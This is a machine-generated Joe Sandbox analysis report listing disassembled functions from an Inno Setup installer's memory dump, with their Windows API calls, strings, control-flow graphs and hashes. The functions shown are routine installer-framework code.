                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseOpen
                                                                                                                                                                                                                                  • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                                                                                                                                                  • API String ID: 47109696-1093091907
                                                                                                                                                                                                                                  • Opcode ID: b9928a5b5c0cf6c1dc91f6627cbb06318d05b30c5d76f15ccadbaf9fdfcb7506
                                                                                                                                                                                                                                  • Instruction ID: 069c4cdb4b1287edb5c1b702bebeb6c44c7684ad2aa17a57d1fdfe9a2539746b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b9928a5b5c0cf6c1dc91f6627cbb06318d05b30c5d76f15ccadbaf9fdfcb7506
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B51A330A006449BCB15DB65D881BDEB7F5EB48304F50857EE840AB391EB79AF01CB59
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0047C66C Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 187COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0042D898: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00453DB4,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5), ref: 0042D8AB
                                                                                                                                                                                                                                    • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                                                                                                                                                                    • Part of subcall function 0042D8F0: GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B5A,00000000,00453BFD,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FED,00000000), ref: 0042D90A
                                                                                                                                                                                                                                    • Part of subcall function 0042D8F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D910
                                                                                                                                                                                                                                  • SHGetKnownFolderPath.SHELL32(00499D30,00008000,00000000,?,00000000,0047C942), ref: 0047C846
                                                                                                                                                                                                                                  • 757283B0.OLE32(?,0047C88B), ref: 0047C87E
                                                                                                                                                                                                                                    • Part of subcall function 0042D208: GetEnvironmentVariableA.KERNEL32(00000000,00000000,00000000,?,?,00000000,0042DA3E,00000000,0042DAD0,?,?,?,0049B628,00000000,00000000), ref: 0042D233
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Directory$757283AddressEnvironmentFolderHandleKnownModulePathProcSystemVariableWindows
                                                                                                                                                                                                                                  • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                                                                                                                                                                                  • API String ID: 795111782-544719455
                                                                                                                                                                                                                                  • Opcode ID: 23963da8b4b34a95ffd58041a931adf40c150fbdd8371ea61f0364dbdea36cdf
                                                                                                                                                                                                                                  • Instruction ID: 88e29a10730232d74bbdb0c5b7d00c3ea12cf2700f44d19641833b453bfd909d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 23963da8b4b34a95ffd58041a931adf40c150fbdd8371ea61f0364dbdea36cdf
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1461CF74A00204AFDB10EBA5D8C2A9E7B69EB44319F90C47FE404A7392DB3C9A44CF5D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00423874 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 98windowregistryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1949 423874-42387e 1950 4239a7-4239ab 1949->1950 1951 423884-4238a6 call 41f3c4 GetClassInfoA 1949->1951 1954 4238d7-4238e0 GetSystemMetrics 1951->1954 1955 4238a8-4238bf RegisterClassA 1951->1955 1957 4238e2 1954->1957 1958 4238e5-4238ef GetSystemMetrics 1954->1958 1955->1954 1956 4238c1-4238d2 call 408cbc call 40311c 1955->1956 1956->1954 1957->1958 1960 4238f1 1958->1960 1961 4238f4-423950 call 403738 call 4062e8 call 403400 call 42364c SetWindowLongA 1958->1961 1960->1961 1972 423952-423965 call 424178 SendMessageA 1961->1972 1973 42396a-423998 GetSystemMenu DeleteMenu * 2 1961->1973 1972->1973 1973->1950 1975 42399a-4239a2 DeleteMenu 1973->1975 1975->1950
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0041F3C4: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDA4,?,0042388F,00423C0C,0041EDA4), ref: 0041F3E2
                                                                                                                                                                                                                                  • GetClassInfoA.USER32(00400000,0042367C), ref: 0042389F
                                                                                                                                                                                                                                  • RegisterClassA.USER32(00499630), ref: 004238B7
                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000000), ref: 004238D9
                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000001), ref: 004238E8
                                                                                                                                                                                                                                  • SetWindowLongA.USER32(00410460,000000FC,0042368C), ref: 00423944
                                                                                                                                                                                                                                  • SendMessageA.USER32(00410460,00000080,00000001,00000000), ref: 00423965
                                                                                                                                                                                                                                  • GetSystemMenu.USER32(00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C,0041EDA4), ref: 00423970
                                                                                                                                                                                                                                  • DeleteMenu.USER32(00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C,0041EDA4), ref: 0042397F
                                                                                                                                                                                                                                  • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0042398C
                                                                                                                                                                                                                                  • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000), ref: 004239A2
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                                                                                                                                                                                                                  • String ID: |6B
                                                                                                                                                                                                                                  • API String ID: 183575631-3009739247
                                                                                                                                                                                                                                  • Opcode ID: 4cae07da4ecbd82a5ef2c5022e230c145e19d211ee6ce0cd027d67cd6f27acc7
                                                                                                                                                                                                                                  • Instruction ID: 5979ac727d64f3fe5c9a0a43452729076f54e0f9e4c251b9a4c28f9d6bed272f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4cae07da4ecbd82a5ef2c5022e230c145e19d211ee6ce0cd027d67cd6f27acc7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E63152B17402006AEB10AF69DC82F6A37989B14709F60017BFA44EF2D7C6BDED40876D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0047CE78 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 95libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1977 47ce78-47cece call 42c3fc call 4035c0 call 47cb3c call 4525d8 1986 47ced0-47ced5 call 453344 1977->1986 1987 47ceda-47cee9 call 4525d8 1977->1987 1986->1987 1991 47cf03-47cf09 1987->1991 1992 47ceeb-47cef1 1987->1992 1995 47cf20-47cf48 call 42e394 * 2 1991->1995 1996 47cf0b-47cf11 1991->1996 1993 47cf13-47cf1b call 403494 1992->1993 1994 47cef3-47cef9 1992->1994 1993->1995 1994->1991 1999 47cefb-47cf01 1994->1999 2003 47cf6f-47cf89 GetProcAddress 1995->2003 2004 47cf4a-47cf6a call 4078f4 call 453344 1995->2004 1996->1993 1996->1995 1999->1991 1999->1993 2006 47cf95-47cfb2 call 403400 * 2 2003->2006 2007 47cf8b-47cf90 call 453344 2003->2007 2004->2003 2007->2006
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6E290000,SHGetFolderPathA), ref: 0047CF7A
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressProc
                                                                                                                                                                                                                                  • String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$]xI$_isetup\_shfoldr.dll$shell32.dll$shfolder.dll
                                                                                                                                                                                                                                  • API String ID: 190572456-256906917
                                                                                                                                                                                                                                  • Opcode ID: c4b8d3d93c7f37bb14fa31bc5bbe574b3393d33fbabbe9beac26f258e91ad005
                                                                                                                                                                                                                                  • Instruction ID: ec9c61b31d03a4d18d2fa5da2167344019e511a33ceb5cf80618cf604467b355
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c4b8d3d93c7f37bb14fa31bc5bbe574b3393d33fbabbe9beac26f258e91ad005
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 20311D30E001499BCB10EFA5D5D1ADEB7B5EF44308F50847BE504E7281D778AE458B6D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040631C Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 2126 40631c-406336 GetModuleHandleA GetProcAddress 2127 406338 2126->2127 2128 40633f-40634c GetProcAddress 2126->2128 2127->2128 2129 406355-406362 GetProcAddress 2128->2129 2130 40634e 2128->2130 2131 406364-406366 SetProcessDEPPolicy 2129->2131 2132 406368-406369 2129->2132 2130->2129 2131->2132
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498BC0), ref: 00406322
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                                                                                                                                                                                                  • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498BC0), ref: 00406366
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressProc$HandleModulePolicyProcess
                                                                                                                                                                                                                                  • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                                                                                                                                                                  • API String ID: 3256987805-3653653586
                                                                                                                                                                                                                                  • Opcode ID: fb4db72500fb8039bf9e982fa136c472a352d03826636d66c2b82dec8efce00d
                                                                                                                                                                                                                                  • Instruction ID: 935c6a5f7b98c90e27654dc67135d8c1f882d2ad5d8c1b9d0efaf55941893a49
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fb4db72500fb8039bf9e982fa136c472a352d03826636d66c2b82dec8efce00d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 97E02D90380702ACEA1032B20D82F3B144C9B54B69B26543B7D56B51C7D9BDDD7059BD
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041321B Relevance: 14.6, APIs: 6, Strings: 2, Instructions: 633COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetWindowLongA.USER32(?,000000FC,?), ref: 00413664
                                                                                                                                                                                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 0041366F
                                                                                                                                                                                                                                  • GetWindowLongA.USER32(?,000000F4), ref: 00413681
                                                                                                                                                                                                                                  • SetWindowLongA.USER32(?,000000F4,?), ref: 00413694
                                                                                                                                                                                                                                  • SetPropA.USER32(?,00000000,00000000), ref: 004136AB
                                                                                                                                                                                                                                  • SetPropA.USER32(?,00000000,00000000), ref: 004136C2
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: LongWindow$Prop
                                                                                                                                                                                                                                  • String ID: 3A$yA
                                                                                                                                                                                                                                  • API String ID: 3887896539-3278460822
                                                                                                                                                                                                                                  • Opcode ID: d9856cee796f57cc1685d9958f98130356579251106e4d85d69cc018d86e5275
                                                                                                                                                                                                                                  • Instruction ID: bcb4e109f9bb3244d1d15a250a8b19338fc20a7c4ef9bfc7c396c8b3ff51cb63
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d9856cee796f57cc1685d9958f98130356579251106e4d85d69cc018d86e5275
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8C22D06508E3C05FE31B9B74896A5D57FA0EE13325B1D45DFC4C28B1A3D21E8A8BC71A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00467180 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 141windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 2894 467180-46722a call 41461c call 41463c call 41461c call 41463c SHGetFileInfo 2903 46725f-46726a call 478e04 2894->2903 2904 46722c-467233 2894->2904 2909 46726c-4672b1 call 42c3fc call 40357c call 403738 ExtractIconA call 4670c0 2903->2909 2910 4672bb-4672ce call 47d33c 2903->2910 2904->2903 2905 467235-46725a ExtractIconA call 4670c0 2904->2905 2905->2903 2932 4672b6 2909->2932 2916 4672d0-4672da call 47d33c 2910->2916 2917 4672df-4672e3 2910->2917 2916->2917 2920 4672e5-467308 call 403738 SHGetFileInfo 2917->2920 2921 46733d-467371 call 403400 * 2 2917->2921 2920->2921 2930 46730a-467311 2920->2930 2930->2921 2931 467313-467338 ExtractIconA call 4670c0 2930->2931 2931->2921 2932->2921
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00467223
                                                                                                                                                                                                                                  • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467249
                                                                                                                                                                                                                                    • Part of subcall function 004670C0: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 00467158
                                                                                                                                                                                                                                    • Part of subcall function 004670C0: DestroyCursor.USER32(00000000), ref: 0046716E
                                                                                                                                                                                                                                  • ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004672A0
                                                                                                                                                                                                                                  • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00467301
                                                                                                                                                                                                                                  • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467327
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Icon$Extract$FileInfo$CursorDestroyDraw
                                                                                                                                                                                                                                  • String ID: c:\directory$shell32.dll$%H
                                                                                                                                                                                                                                  • API String ID: 3376378930-166502273
                                                                                                                                                                                                                                  • Opcode ID: d7a251f7ede599729126a20c6e5bc656e487c76ea0efebb03c6af550fa195c4c
                                                                                                                                                                                                                                  • Instruction ID: 732e1a1751fb8a235258c93266195bfa595ebd68417bad8a6af0601d960a2915
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d7a251f7ede599729126a20c6e5bc656e487c76ea0efebb03c6af550fa195c4c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8A516070604244AFD710DF65CD8AFDFB7A8EB48308F1081A6F80897351D6789E81DA59
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0042F560 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 90windowregistryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetActiveWindow.USER32 ref: 0042F58F
                                                                                                                                                                                                                                  • GetFocus.USER32 ref: 0042F597
                                                                                                                                                                                                                                  • RegisterClassA.USER32(004997AC), ref: 0042F5B8
                                                                                                                                                                                                                                  • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F68C,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F5F6
                                                                                                                                                                                                                                  • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F63C
                                                                                                                                                                                                                                  • ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F64D
                                                                                                                                                                                                                                  • SetFocus.USER32(00000000,00000000,0042F66F,?,?,?,00000001,00000000,?,00458352,00000000,0049B628), ref: 0042F654
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$CreateFocus$ActiveClassRegisterShow
                                                                                                                                                                                                                                  • String ID: TWindowDisabler-Window
                                                                                                                                                                                                                                  • API String ID: 3167913817-1824977358
                                                                                                                                                                                                                                  • Opcode ID: d82bdac47665a0423d7aef7e4f95abac113c6b4ba7ee72313a02f6ddbd37ff30
                                                                                                                                                                                                                                  • Instruction ID: c3989f54cd535b42bfd745bd8d6279a550c1ea008e6f4be51b2d228796931bcd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d82bdac47665a0423d7aef7e4f95abac113c6b4ba7ee72313a02f6ddbd37ff30
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B021A170740710BAE310EF66AD43F1A76B8EB04B44F91853BF604AB2E1D7B86D0586AD
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004531F0 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 46libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 00453210
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453216
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 0045322A
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453230
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
